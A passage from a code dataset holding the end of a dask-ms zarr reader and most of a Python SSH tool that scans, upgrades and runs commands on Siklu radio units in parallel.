start, end in extents)]\n\n\ndef group_sortkey(element):\n return int(element[0].split('_')[-1])\n\n\n@requires(\"pip install dask-ms[zarr] for zarr support\",\n zarr_import_error)\ndef xds_from_zarr(store, columns=None, chunks=None):\n \"\"\"\n Reads the zarr data store in `store` and returns list of\n Dataset's containing the data.\n\n Parameters\n ----------\n store : str or Path\n Path containing the data\n columns : list of str or str or None\n Columns to read. 
`None` or `\"ALL\"` stores all columns on each dataset.\n Otherwise, a list of columns should be supplied.\n chunks: dict or list of dicts\n chunking schema for each dataset\n\n Returns\n -------\n writes : Dataset or list of Datasets\n Dataset(s) representing write operations\n \"\"\"\n if isinstance(store, DaskMSStore):\n pass\n elif isinstance(store, Path):\n store = DaskMSStore(f\"file://{store}\")\n elif isinstance(store, str):\n store = DaskMSStore(f\"file://{store}\")\n else:\n raise TypeError(f\"store '{store}' must be \"\n f\"Path, str or DaskMSStore\")\n\n columns = promote_columns(columns)\n\n if chunks is None:\n pass\n elif isinstance(chunks, (tuple, list)):\n if not all(isinstance(v, dict) for v in chunks):\n raise TypeError(\"chunks must be None, a dict or a list of dicts\")\n elif isinstance(chunks, dict):\n chunks = [chunks]\n else:\n raise TypeError(\"chunks must be None, a dict or a list of dicts\")\n\n datasets = []\n numpy_vars = []\n\n table_group = zarr.open(store.map)[store.table]\n\n for g, (group_name, group) in enumerate(sorted(table_group.groups(),\n key=group_sortkey)):\n group_attrs = decode_attr(dict(group.attrs))\n dask_ms_attrs = group_attrs.pop(DASKMS_ATTR_KEY)\n natural_chunks = dask_ms_attrs[\"chunks\"]\n group_chunks = {d: tuple(dc) for d, dc in natural_chunks.items()}\n\n if chunks:\n # Defer to user-supplied chunking strategy\n try:\n group_chunks.update(chunks[g])\n except IndexError:\n group_chunks.update(chunks[-1]) # Reuse last chunking.\n pass\n\n data_vars = {}\n coords = {}\n\n for name, zarray in column_iterator(group, columns):\n attrs = decode_attr(dict(zarray.attrs[DASKMS_ATTR_KEY]))\n dims = attrs[\"dims\"]\n coordinate = attrs.get(\"coordinate\", False)\n array_chunks = tuple(group_chunks.get(d, s) for d, s\n in zip(dims, zarray.shape))\n\n array_chunks = da.core.normalize_chunks(array_chunks, zarray.shape)\n ext_args = extent_args(dims, array_chunks)\n token_name = f\"read~{name}-{tokenize(zarray, *ext_args)}\"\n\n read = da.blockwise(zarr_getter, dims,\n zarray, None,\n *ext_args,\n concatenate=False,\n name=token_name,\n meta=np.empty((0,)*zarray.ndim, zarray.dtype))\n\n read = inlined_array(read, ext_args[::2])\n var = Variable(dims, read, attrs)\n (coords if coordinate else data_vars)[name] = var\n\n # Save numpy arrays for reification\n typ = decode_type(attrs[\"array_type\"])\n\n if typ is np.ndarray:\n numpy_vars.append(var)\n elif typ is da.Array:\n pass\n else:\n raise TypeError(f\"Unknown array_type '{attrs['array_type']}'\")\n\n datasets.append(Dataset(data_vars, coords=coords, attrs=group_attrs))\n\n # Reify any numpy arrays directly into their variables\n for v, a in zip(numpy_vars, dask.compute(v.data for v in numpy_vars)[0]):\n v.data = a\n\n return datasets\n","sub_path":"daskms/experimental/zarr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":12403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"312034376","text":"from __future__ import print_function\n\nimport collections\nimport os\nimport pandas as pd\nimport platform\nimport re\nimport sys\nimport sys\nimport time\nfrom multiprocessing import Pool\nfrom subprocess import call\n\ntry:\n from configparser import ConfigParser\nexcept ImportError:\n from ConfigParser import ConfigParser # ver. 
< 3.0\n\ntry:\n    import wexpect\n\n    TIMEOUT = wexpect.TIMEOUT\n    EOF = wexpect.EOF\nexcept ImportError:\n    import pexpect\n\n    TIMEOUT = pexpect.TIMEOUT\n    EOF = pexpect.EOF\n\nfrom datetime import datetime, timedelta\n\n\n############################################################################\n\nclass SikluUnit:\n    def __init__(self, host, username, password, port='22', connection_timeout=12, debug=True):\n        self.host = host\n        self.user = username\n        self.passwd = password\n        self.port = port\n        self.connection_timeout = connection_timeout\n        self.debug = debug\n        self.prompt = '~ #'\n        self.prompt2 = \">$\"\n\n        self.connected = False\n        self.connection = None\n\n        # if platform.system() == 'Windows':\n        #     self.sshask_newkey = 'Store key in cache?'\n        #     self.sshask_newkey_answer = 'y'\n        # else:\n        self.sshask_newkey = 'Are you sure you want to continue connecting'\n        self.sshask_newkey_answer = 'yes'\n\n        self.sshask_passwd = self.user + \"@\" + self.host + \"'s password: \"\n        self.noroutehost = 'No route to host'\n        self.exit = 'exit'\n\n    def disconnect(self):\n        if self.connected:\n            self.connection.sendline(self.exit)\n            self.connection.expect(EOF)\n            self.connected = False\n            self.connection = None\n\n    def __del__(self):\n        self.disconnect()\n\n    def connect(self):\n        # renew SSH key\n        # ssh - keygen - f \"/root/.ssh/known_hosts\" - R 172.20.4.6\n        if self.connected:\n            self.disconnect()\n\n        kiss = True\n\n        try:\n            if platform.system() == 'Windows':\n                foo = wexpect.spawn(r'ssh %s@%s' % (self.user, self.host))\n            else: # assume linux\n                foo = pexpect.spawn('ssh %s@%s' % (self.user, self.host))\n\n            i = foo.expect([TIMEOUT, self.sshask_newkey, self.sshask_passwd, self.noroutehost], timeout=self.connection_timeout)\n\n            if i == 0: ## Timeout\n                if self.debug:\n                    print(\"[%s] Connection timeout\" % self.host)\n                kiss = False\n            if i == 1: ## on first connection, accept the new host key\n                foo.sendline(self.sshask_newkey_answer)\n                j = foo.expect([TIMEOUT, self.sshask_passwd])\n                if j == 0:\n                    if self.debug:\n                        print(\"[%s] Password incorrect\" % self.host)\n                    kiss = False\n            if i == 3:\n                if self.debug:\n                    print(\"[%s] No route to host\" % self.host)\n                kiss = False\n            if kiss:\n                foo.sendline(self.passwd)\n                foo.expect(self.prompt2)\n                self.connection = foo\n                self.connected = True\n                if self.debug:\n                    print(\"[%s] Connected successfully\" % self.host)\n        except Exception as e:\n            if self.debug:\n                print(e)\n                print(\"[%s] Unexpected error: %s\" % (self.host, foo.before))\n\n    def send_command(self, command, no_wait=False):\n        if self.debug:\n            print('[%s] %s' % (self.host, command))\n        self.connection.sendline(command)\n        if no_wait:\n            return\n\n        self.connection.expect(self.prompt2)\n        try:\n            return self.connection.before.decode('utf-8')\n        except (AttributeError, UnicodeDecodeError):\n            return self.connection.before\n\n\n#######################################################################################\nclass SikluCommandParam:\n    def __init__(self, name='', value='', regex=r'', format_func=None):\n        self.name = name\n        self.value = value\n        self.regex = regex\n        self.format_func = format_func\n\n\nclass SikluCommandParserBase:\n    cmd = ''\n    cmd_params = [SikluCommandParam()]\n    reverse_reply = False\n    multiline = False\n\n    def __init__(self, connection=None):\n        self.connection = connection\n\n    def parse(self):\n        if self.connection:\n            self.reply = self.connection.send_command(self.cmd)\n            if self.reverse_reply:\n                lines = self.reply.split(\"\\r\\n\")\n                lines.reverse()\n                self.reply = \"\\r\\n\".join(lines)\n        else:\n            self.reply = ''\n        return self.parse_reply()\n\n    def parse_reply(self):\n        for param in self.cmd_params:\n            if 
param.regex:\n if param.format_func:\n param.value = param.format_func(self, self.find_value(param.regex, self.reply))\n else:\n param.value = self.find_value(param.regex, self.reply)\n\n return [param.value for param in self.cmd_params]\n\n def find_value(self, regex, text):\n if self.multiline:\n r = re.search(regex, text, re.MULTILINE)\n else:\n r = re.search(regex, text)\n if r:\n s = r.groups()[0].strip().replace(',', '')\n return s\n else:\n return []\n\n def __str__(self):\n return ','.join(param.name for param in self.cmd_params)\n\n def set_connection(self, connection):\n self.connection = connection\n\n\n#######################################################################################\nclass ShowSystem(SikluCommandParserBase):\n cmd = 'show system'\n\n def format_days_up_time(self, time_str):\n return int(time_str.split(':')[0])\n\n cmd_params = [SikluCommandParam('system_description', '', r\"system description\\s+: (.+)\\n\"),\n SikluCommandParam('system_name', '', r\"system name\\s+: (.+)\\n\"),\n SikluCommandParam('system_location', '', r\"system location\\s+: (.+)\\n\"),\n SikluCommandParam('system_up_days', '', r\"system uptime\\s+: (.+)\\n\", format_days_up_time),\n SikluCommandParam('system_time', '', r\"system time\\s+: (.+)\\n\"),\n SikluCommandParam('system_date', '', r\"system date\\s+: (.+)\\n\"),\n SikluCommandParam('system_temp', '', r\"system temperature\\s+: (.+)\\n\"),\n SikluCommandParam('queue_early_discard', '', r\"system queue-early-discard\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowInventory(SikluCommandParserBase):\n cmd = 'show inventory 1 serial'\n cmd_params = [SikluCommandParam('system_sn', '', r\"inventory 1 serial\\s+: (.+)\\n\"), ]\n\n\nclass ShowNTP(SikluCommandParserBase):\n cmd = 'show ntp'\n cmd_params = [\n SikluCommandParam('ntp_1_server', '', r\"ntp 1 server\\s+: (.+)\\n\"),\n SikluCommandParam('ntp_1_tmz', '', r\"ntp 1 tmz\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowSNMPManager(SikluCommandParserBase):\n cmd = 'show snmp-mng'\n cmd_params = [\n SikluCommandParam('snmp_mng_1_ip_addr', '', r\"snmp-mng 1 ip-addr\\s+: (.+)\\n\"),\n SikluCommandParam('snmp_mng_1_sec_name', '', r\"snmp-mng 1 security-name\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowSNMPAgent(SikluCommandParserBase):\n cmd = 'show snmp-agent'\n cmd_params = [\n SikluCommandParam('snmp_agent_read_com', '', r\"snmp-agent read-com\\s+: (.+)\\n\"),\n SikluCommandParam('snmp_agent_write_com', '', r\"snmp-agent write-com\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowSyslog(SikluCommandParserBase):\n cmd = 'show syslog'\n cmd_params = [\n SikluCommandParam('syslog_1_server', '', r\"syslog 1 server\\s+: (.+)\\n\"),\n ]\n\n\nclass LastLogEvents(SikluCommandParserBase):\n cmd = 'show log'\n reverse_reply = True\n multiline = True\n cmd_params = [SikluCommandParam('last rf reset', '', r\"([A-Z]{1}[a-z]{2}[0-9:\\s]+) sw cad: link down eth eth0\"),\n SikluCommandParam('last system reset', '', r\"([A-Z]{1}[a-z]{2}[0-9:\\s]+) sw bspd: \\*\\*\\* Reset\"),\n ]\n # def parse_reply(self):\n # pass\n\n\nclass ShowSW(SikluCommandParserBase):\n cmd = 'show sw'\n cmd_params = [SikluCommandParam('bank', '1', ''),\n SikluCommandParam('b1_ver', '', r\"1\\s+[MH-]*?([\\.0123456789]+)\\s+\"),\n # SikluCommandParam('b1_date', '', r\"1\\s+[MH-]*?[\\.0123456789]+\\s+([\\-0123456789]+)\\s+\"),\n # SikluCommandParam('b1_time', '', r\"1\\s+[MH-]*?[\\.0123456789]+\\s+[\\-0123456789]+\\s+([\\:0123456789]+)\\s+\"),\n SikluCommandParam('b1_running', '',\n 
r\"1\\s+[MH-]*?[\\.0123456789]+\\s+[\\-0123456789]+\\s+[\\:0123456789]+\\s+([\\w-]+)\\s+\"),\n SikluCommandParam('b1_scheduled_to_run', '',\n r\"1\\s+[MH-]*?[\\.0123456789]+\\s+[\\-0123456789]+\\s+[\\:0123456789]+\\s+[\\w-]+\\s+([\\w]+)\\s+\"),\n SikluCommandParam('b1_startup', '',\n r\"1\\s+[MH-]*?[\\.0123456789]+\\s+[\\-0123456789]+\\s+[\\:0123456789]+\\s+[\\w-]+\\s+[\\w]+\\s+([\\w]+)\"),\n SikluCommandParam('bank', '2', ''),\n SikluCommandParam('b2_ver', '', r\"2\\s+[MH-]*?([\\.0123456789]+)\\s+\"),\n # SikluCommandParam('b2_date', '', r\"2\\s+[MH-]*?[\\.0123456789]+\\s+([\\-0123456789]+)\\s+\"),\n # SikluCommandParam('b2_time', '', r\"2\\s+[MH-]*?[\\.0123456789]+\\s+[\\-0123456789]+\\s+([\\:0123456789]+)\\s+\"),\n SikluCommandParam('b2_running', '',\n r\"2\\s+[MH-]*?[\\.0123456789]+\\s+[\\-0123456789]+\\s+[\\:0123456789]+\\s+([\\w-]+)\\s+\"),\n SikluCommandParam('b2_scheduled_to_run', '',\n r\"2\\s+[MH-]*?[\\.0123456789]+\\s+[\\-0123456789]+\\s+[\\:0123456789]+\\s+[\\w-]+\\s+([\\w]+)\\s+\"),\n SikluCommandParam('b2_startup', '',\n r\"2\\s+[MH-]*?[\\.0123456789]+\\s+[\\-0123456789]+\\s+[\\:0123456789]+\\s+[\\w-]+\\s+[\\w]+\\s+([\\w]+)\"),\n ]\n\n\nclass ShowRF(SikluCommandParserBase):\n cmd = 'show rf'\n cmd_params = [SikluCommandParam('rf_operational', '', r\"rf operational\\s+: (.+)\\n\"),\n SikluCommandParam('rf_cinr', '', r\"rf cinr\\s+: (.+)\\n\"),\n SikluCommandParam('rf_rssi', '', r\"rf rssi\\s+: (.+)\\n\"),\n SikluCommandParam('rf_frequency', '', r\"rf [tx-]*?frequency\\s+: (.+)\\n\"),\n SikluCommandParam('rf_mode', '', r\"rf mode\\s+: (.+)\\n\"),\n SikluCommandParam('rf_role', '', r\"rf role\\s+: (.+)\\n\"),\n SikluCommandParam('rf_tx_asymmetry', '', r\"rf tx-asymmetry\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowRFStatus(SikluCommandParserBase):\n cmd = 'show rf operational'\n cmd_params = [SikluCommandParam('rf_operational', '', r\"rf operational\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowRFDebug(SikluCommandParserBase):\n cmd = 'show rf-debug'\n cmd_params = [SikluCommandParam('cinr_low', '', r\"rf-debug cinr-low\\s+: (.+)\\n\"),\n SikluCommandParam('link_length', '', r\"rf-debug link-length\\s+: (.+)\\n\"),\n SikluCommandParam('tx_temp', '', r\"rf-debug tx-temperature\\s+: (.+)\\n\"),\n SikluCommandParam('rx_temp', '', r\"rf-debug rx-temperature\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowRSSI(SikluCommandParserBase):\n cmd = 'show rf rssi'\n cmd_params = [SikluCommandParam('rf_rssi', '', r\"rf rssi\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowLicense(SikluCommandParserBase):\n cmd = 'show license'\n cmd_params = [SikluCommandParam('data_rate_status', '', r\"license\\s+data-rate\\s+status\\s+:\\s+(.+)\\n\"),\n SikluCommandParam('data_rate_permission', '', r\"license\\s+data-rate\\s+permission\\s+:\\s+(.+)\\n\"),\n ]\n\n\nclass ShowRing(SikluCommandParserBase):\n\n def __init__(self, connection=None, ring_num=1):\n SikluCommandParserBase.__init__(self, connection)\n self.ring_num = ring_num\n self.cmd = 'show ring %d' % self.ring_num\n self.cmd_params = [SikluCommandParam('ring_number', self.ring_num, ''),\n SikluCommandParam('ring-id', '', r\"ring \\d ring-id\\s+: (.+)\\n\"),\n SikluCommandParam('type', '', r\"ring \\d type\\s+: (.+)\\n\"),\n SikluCommandParam('role', '', r\"ring \\d role\\s+: (.+)\\n\"),\n SikluCommandParam('parent-ring', '', r\"ring \\d parent-ring\\s+: (.+)\\n\"),\n SikluCommandParam('cw-port', '', r\"ring \\d cw-port\\s+: (.+)\\n\"),\n SikluCommandParam('acw-port', '', r\"ring \\d acw-port\\s+: (.+)\\n\"),\n SikluCommandParam('raps-cvid', '', r\"ring \\d raps-cvid\\s+: (.+)\\n\"),\n 
SikluCommandParam('state', '', r\"ring \\d state\\s+: (.+)\\n\"),\n SikluCommandParam('last-state-time', '', r\"ring \\d last-state-time\\s+: (.+)\\n\"),\n SikluCommandParam('cw-status-data', '', r\"ring \\d cw-status-data\\s+: (.+)\\n\"),\n SikluCommandParam('acw-status-data', '', r\"ring \\d acw-status-data\\s+: (.+)\\n\"),\n SikluCommandParam('cw-status-raps', '', r\"ring \\d cw-status-raps\\s+: (.+)\\n\"),\n SikluCommandParam('acw-status-raps', '', r\"ring \\d acw-status-raps\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowMngVLAN(SikluCommandParserBase):\n cmd = 'show bridge-port c3 eth1 pvid'\n cmd_params = [SikluCommandParam('eth1_pvid', '', r\"bridge-port c3 eth1 pvid\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowEth1(SikluCommandParserBase):\n cmd = 'show eth eth1 eth-act-type'\n cmd_params = [SikluCommandParam('eth1_act_type', '', r\"eth eth1 eth-act-type\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowEth2(SikluCommandParserBase):\n cmd = 'show eth eth2 eth-act-type'\n cmd_params = [SikluCommandParam('eth2_act_type', '', r\"eth eth2 eth-act-type\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowEth3(SikluCommandParserBase):\n cmd = 'show eth eth3 eth-act-type'\n cmd_params = [SikluCommandParam('eth3_act_type', '', r\"eth eth3 eth-act-type\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowBU(SikluCommandParserBase):\n cmd = 'show base-unit'\n cmd_params = [SikluCommandParam('self_mac', '', r\"base-unit self-mac\\s+: (.+)\\n\"),\n SikluCommandParam('ssid', '', r\"base-unit ssid\\s+: (.+)\\n\"),\n SikluCommandParam('password', '', r\"base-unit password\\s+: (.+)\\n\"),\n SikluCommandParam('frequency', '', r\"base-unit frequency\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowTU(SikluCommandParserBase):\n cmd = 'show terminal-unit'\n cmd_params = [SikluCommandParam('self_mac', '', r\"terminal-unit self-mac\\s+: (.+)\\n\"),\n SikluCommandParam('bu_mac', '', r\"terminal-unit base-unit-mac\\s+: (.+)\\n\"),\n SikluCommandParam('ssid', '', r\"terminal-unit ssid\\s+: (.+)\\n\"),\n SikluCommandParam('password', '', r\"terminal-unit password\\s+: (.+)\\n\"),\n SikluCommandParam('frequency', '', r\"terminal-unit frequency\\s+: (.+)\\n\"),\n SikluCommandParam('tx_mcs', '', r\"terminal-unit tx-mcs\\s+: (.+)\\n\"),\n SikluCommandParam('rssi', '', r\"terminal-unit rssi\\s+: (.+)\\n\"),\n SikluCommandParam('signal_quality', '', r\"terminal-unit signal-quality\\s+: (.+)\\n\"),\n SikluCommandParam('connect_time', '', r\"terminal-unit connect-time\\s+: (.+)\\n\"),\n ]\n\n\nclass ShowRemoteTU(SikluCommandParserBase):\n cmd = 'show remote-terminal-unit'\n\n def __init__(self, connection=None):\n SikluCommandParserBase.__init__(self, connection)\n self.cmd_params = [item for sublist in [self.gen_cmd_params(tu_num) for tu_num in range(1, 9)] for item in\n sublist]\n\n def gen_cmd_params(self, tu_num):\n return [SikluCommandParam('tu_num_%d' % tu_num, tu_num, r\"\"),\n SikluCommandParam('eth_port_%d' % tu_num, '', r\"remote-terminal-unit %d eth-port\\s+: (.+)\\n\" % tu_num),\n SikluCommandParam('mac_%d' % tu_num, '', r\"remote-terminal-unit %d mac\\s+: (.+)\\n\" % tu_num),\n SikluCommandParam('name_%d' % tu_num, '', r\"remote-terminal-unit %d name\\s+: (.+)\\n\" % tu_num),\n SikluCommandParam('status_%d' % tu_num, '', r\"remote-terminal-unit %d status\\s+: (.+)\\n\" % tu_num),\n SikluCommandParam('tx_mcs_%d' % tu_num, '', r\"remote-terminal-unit %d tx-mcs\\s+: (.+)\\n\" % tu_num),\n SikluCommandParam('rssi_%d' % tu_num, '', r\"remote-terminal-unit %d rssi\\s+: (.+)\\n\" % tu_num),\n SikluCommandParam('signal_quality_%d' % tu_num, '',\n r\"remote-terminal-unit %d 
signal-quality\\s+: (.+)\\n\" % tu_num),\n SikluCommandParam('tx_sector_%d' % tu_num, '',\n r\"remote-terminal-unit %d tx-sector\\s+: (.+)\\n\" % tu_num),\n SikluCommandParam('rem_tx_sector_%d' % tu_num, '',\n r\"remote-terminal-unit %d rem-tx-sector\\s+: (.+)\\n\" % tu_num),\n ]\n\n\nclass ShowLLDPRemote(SikluCommandParserBase):\n cmd = 'show lldp-remote'\n\n def __init__(self, connection=None):\n SikluCommandParserBase.__init__(self, connection)\n self.cmd_params = [item for sublist in [self.gen_cmd_params(eth_num) for eth_num in range(0, 5)] for item in\n sublist]\n\n def gen_cmd_params(self, eth_num):\n return [\n SikluCommandParam('chassis_id_%d' % eth_num, '',\n r\"lldp-remote eth%d [\\d]{1} chassis-id\\s+: (.+)\\n\" % eth_num),\n SikluCommandParam('port_descr_%d' % eth_num, '',\n r\"lldp-remote eth%d [\\d]{1} port-descr\\s+: (.+)\\n\" % eth_num),\n SikluCommandParam('sys_name_%d' % eth_num, '', r\"lldp-remote eth%d [\\d]{1} sys-name\\s+: (.+)\\n\" % eth_num),\n SikluCommandParam('sys_descr_%d' % eth_num, '',\n r\"lldp-remote eth%d [\\d]{1} sys-descr\\s+: (.+)\\n\" % eth_num),\n ]\n\n\nclass ShowRfStatisticsDaily(SikluCommandParserBase):\n cmd = 'show rf statistics-summary-days'\n multiline = True\n\n def __init__(self, connection=None):\n SikluCommandParserBase.__init__(self, connection)\n self.cmd_params = [item for sublist in [self.gen_cmd_params(day) for day in range(0, 32)] for item in sublist]\n\n def gen_cmd_params(self, day):\n return [\n # SikluCommandParam('date_%d' % eth_num, '', r\"lldp-remote eth%d [\\d]{1} chassis-id\\s+: (.+)\\n\" % eth_num),\n # SikluCommandParam('min_rssi_%d' % eth_num, '', r\"lldp-remote eth%d [\\d]{1} port-descr\\s+: (.+)\\n\" % eth_num),\n # SikluCommandParam('min_cinr_%d' % eth_num, '', r\"lldp-remote eth%d [\\d]{1} sys-name\\s+: (.+)\\n\" % eth_num),\n SikluCommandParam('min_mod_%d' % day, '',\n r\"^%d\\s+[\\.\\d]+\\s+[:\\d]+\\s+[-\\d]+\\s+[-\\d]+\\s+[-\\d]+\\s+[-\\d]+\\s+([\\w\\d]+)\\s+[\\w\\d]+\\s+[yesno]+\" % day),\n ]\n\n\nclass ShowRfStatisticsSummary(SikluCommandParserBase):\n multiline = True\n columns = ['interval', 'start_ts', 'min-rssi', 'max-rssi', 'min-cinr', 'max-cinr', 'min-mod', 'max-mod']\n\n def __init__(self, connection=None):\n self.cmd = 'show rf statistics-summary'\n SikluCommandParserBase.__init__(self, connection)\n self.cmd_params = [item for sublist in [self.gen_cmd_params(time_interval) for time_interval in range(0, 96)]\n for item in sublist]\n\n def gen_cmd_params(self, time_interval):\n return [\n SikluCommandParam('record_%d' % time_interval, '',\n r\"^(%d\\s+[\\.\\d]+\\s+[:\\d]+\\s+[-\\d]+\\s+[-\\d]+\\s+[-\\d]+\\s+[-\\d]+\\s+[\\w\\d\\s\\.]+\\s{2,}[\\w\\d\\s\\.]+\\s{2,}[yesnounknown]+)\" % time_interval),\n ]\n\n def parse_reply(self):\n stats = []\n for param in self.cmd_params:\n interval_values = self.find_value(param.regex, self.reply)\n # import pdb; pdb.set_trace()\n if interval_values:\n r = re.search(\n r\"(\\d+)\\s+([\\.\\d]+\\s+[:\\d]+)\\s+([-\\d]+)\\s+([-\\d]+)\\s+([-\\d]+)\\s+([-\\d]+)\\s+([\\w\\d\\s\\.]+)\\s{2,}([\\w\\d\\s\\.]+)\",\n interval_values)\n if r:\n r = r.groups()\n stats.append(\n [int(r[0]), datetime.strptime(r[1], '%Y.%m.%d %H:%M:%S'), int(r[2]), int(r[3]), int(r[4]),\n int(r[5]), r[6], r[7]])\n else:\n continue\n\n return pd.DataFrame(stats, columns=self.columns)\n\n def __str__(self):\n return ','.join(self.columns)\n\n\nclass ShowRfStatisticsSummaryLast(SikluCommandParserBase):\n columns = ['valid_line', 'min-rssi', 'min-cinr', 'min-mod']\n multiline = True\n\n def __init__(self, 
connection=None):\n self.cmd = 'show rf statistics-summary'\n SikluCommandParserBase.__init__(self, connection)\n self.cmd_params = [item for sublist in\n [self.gen_cmd_params(time_interval) for time_interval in range(95, -1, -1)] for item in\n sublist]\n\n def gen_cmd_params(self, time_interval):\n return [\n SikluCommandParam('record_%d' % time_interval, '',\n r\"^(%d\\s+[\\.\\d]+\\s+[:\\d]+\\s+[-\\d]+\\s+[-\\d]+\\s+[-\\d]+\\s+[-\\d]+\\s+[\\w\\d]+\\s+[\\w\\d]+\\s+[yesno]+)\" % time_interval),\n ]\n\n def parse_reply(self):\n valid_line = 95\n for param in self.cmd_params:\n interval_values = self.find_value(param.regex, self.reply)\n # import pdb; pdb.set_trace()\n if interval_values:\n r = re.search(\n r\"(\\d+)\\s+([\\.\\d]+\\s+[:\\d]+)\\s+([-\\d]+)\\s+([-\\d]+)\\s+([-\\d]+)\\s+([-\\d]+)\\s+([\\w\\d]+)\\s+([\\w\\d]+)\",\n interval_values)\n if r:\n r = r.groups()\n if int(r[0]) == valid_line:\n return [int(r[0]), int(r[2]), int(r[4]), r[6]]\n else:\n valid_line = int(r[0]) - 1\n else:\n continue\n\n return [\"\", \"\", \"\", \"\"]\n\n def __str__(self):\n return ','.join(self.columns)\n\n\nclass ShowEthStatisticsSummary(SikluCommandParserBase):\n multiline = True\n columns = ['interval', 'start_ts', 'interface', 'in-octets', 'out-octets', 'in-rate', 'out-rate', 'util']\n\n def __init__(self, connection=None, eth='eth1'):\n self.cmd = 'show eth %s statistics-summary' % eth\n SikluCommandParserBase.__init__(self, connection)\n self.cmd_params = [item for sublist in [self.gen_cmd_params(time_interval) for time_interval in range(0, 96)]\n for item in sublist]\n\n def gen_cmd_params(self, time_interval):\n return [\n SikluCommandParam('record_%d' % time_interval, '',\n r\"^(%d\\s+[\\.\\d]+\\s+[:\\d]+\\s+eth\\d\\s+[\\d]+\\s+[\\d]+\\s+[\\d]+\\s+[\\d]+\\s+[\\d]+)\" % time_interval),\n ]\n\n def parse_reply(self):\n stats = []\n # print self.reply\n for param in self.cmd_params:\n interval_values = self.find_value(param.regex, self.reply)\n # print param.regex\n # import pdb; pdb.set_trace()\n if interval_values:\n r = re.search(\n r\"(\\d+)\\s+([\\.\\d]+\\s+[:\\d]+)\\s+(eth[\\d])\\s+([\\d]+)\\s+([\\d]+)\\s+([\\d]+)\\s+([\\d]+)\\s+([\\d]+)\",\n interval_values)\n if r:\n r = r.groups()\n stats.append(\n [int(r[0]), datetime.strptime(r[1], '%Y.%m.%d %H:%M:%S'), r[2], int(r[3]), int(r[4]), int(r[5]),\n int(r[6]), int(r[7])])\n else:\n continue\n\n return pd.DataFrame(stats, columns=self.columns)\n\n def __str__(self):\n return ','.join(self.columns)\n\n\n#######################################################################################\ndef scan_unit(unit, commands):\n status = [unit.host, 'scan', True]\n\n for command in commands:\n command.set_connection(unit)\n status += command.parse()\n\n return status\n\n\ndef copy_sw_unit(unit, command):\n try:\n status = unit.send_command(command.replace('upload_sw', 'copy'), no_wait=True)\n status = [unit.host, 'copy', True]\n except Exception as e:\n print(e)\n status = [unit.host, 'copy', False, str(e)]\n\n return status\n\n\ndef run_sw_unit(unit, accept_timeout=600, rollback_timeout=600):\n try:\n status = unit.send_command('copy running-configuration startup-configuration')\n status = unit.send_command('run sw next-rst %d' % accept_timeout)\n status = unit.send_command('set rollback timeout %d' % rollback_timeout)\n status = [unit.host, 'run_sw', True]\n except Exception as e:\n print(e)\n status = [unit.host, 'run_sw', False, str(e)]\n\n return status\n\n\ndef accept_unit(unit):\n try:\n status = unit.send_command('accept sw')\n status = 
[unit.host, 'accept', True]\n except Exception as e:\n print(e)\n status = [unit.host, 'accept', False, str(e)]\n\n return status\n\n\ndef copy_script_unit(unit, command):\n try:\n status = unit.send_command(command.replace('upload_script', 'copy'), no_wait=True)\n status = [unit.host, 'upload_script', True]\n except Exception as e:\n print(e)\n status = [unit.host, 'upload_script', False, str(e)]\n return status\n\n\ndef run_script_unit(unit, command):\n try:\n status = unit.send_command(command.replace('run_script', 'run'), no_wait=True)\n status = [unit.host, 'run_script', True]\n except Exception as e:\n print(e)\n status = [unit.host, 'run_script', False, str(e)]\n\n return status\n\n\ndef run_command_unit(unit, command):\n try:\n status = unit.send_command(command.replace('run_command ', ''), no_wait=True)\n status = [unit.host, 'run_command', True]\n except Exception as e:\n print(e)\n status = [unit.host, 'run_command', False, str(e)]\n\n return status\n\n\n##############################################################################\ndef run_command(unit_):\n unit = unit_['unit']\n command = unit_['command']\n\n if not unit.connected:\n unit.connect()\n\n if unit.connected:\n if command.startswith('upload_sw'):\n status = copy_sw_unit(unit, command)\n elif command.startswith('run_sw'):\n status = run_sw_unit(unit, accept_timeout=600, rollback_timeout=600)\n elif command.startswith('accept'):\n status = accept_unit(unit)\n elif command.startswith('scan'):\n commands = unit_['scan_commands']\n status = scan_unit(unit, commands)\n elif command.startswith('upload_script'):\n status = copy_script_unit(unit, command)\n elif command.startswith('run_script'):\n status = run_script_unit(unit, command)\n elif command.startswith('run_command'):\n status = run_command_unit(unit, command)\n else:\n status = [unit.host, command, False, 'Invalid command']\n else:\n status = [unit.host, 'scan', False, 'No connection']\n\n ts = time.strftime('%d-%m-%Y %H:%M:%S', time.localtime())\n s = ','.join([ts] + [str(x) for x in status])\n return s\n\n\ndef units_manager_parallel(hosts, RINGS=3, MH_ENABLED=False, N_PROCESSES=10):\n units = []\n\n # add scan commands here\n scan_commands = [ShowInventory(), ShowSystem(), ShowNTP(),\n ShowSyslog(), ShowSNMPManager(), ShowSNMPAgent(),\n ShowRfStatisticsSummaryLast(),\n ShowSW(), ShowRF(), ShowRFDebug(), ShowLicense(),\n ShowMngVLAN(), ShowEth1(), ShowEth2(), ShowEth3(), ShowLLDPRemote()] \\\n + [ShowRing(ring_num=n + 1) for n in range(RINGS)] \\\n + [ShowRfStatisticsDaily(), ]\n\n if MH_ENABLED:\n scan_commands += [ShowBU(), ShowTU(), ShowRemoteTU()]\n\n for i, host in hosts.iterrows():\n unit = SikluUnit(host['ip'], host['user'], host['password'])\n units.append({'unit': unit, 'command': host['command'], 'scan_commands': scan_commands})\n\n ts = time.strftime('%d%m%Y_%H%M', time.localtime())\n filename = 'execution_log_%s.csv' % ts\n\n file_header = 'time_stamp,host,command,command_status,' + ','.join(str(command) for command in scan_commands) + '\\n'\n\n pool = Pool(processes=N_PROCESSES)\n replies = pool.map(run_command, units)\n pool.close()\n pool.join()\n\n fid = open(filename, 'w')\n 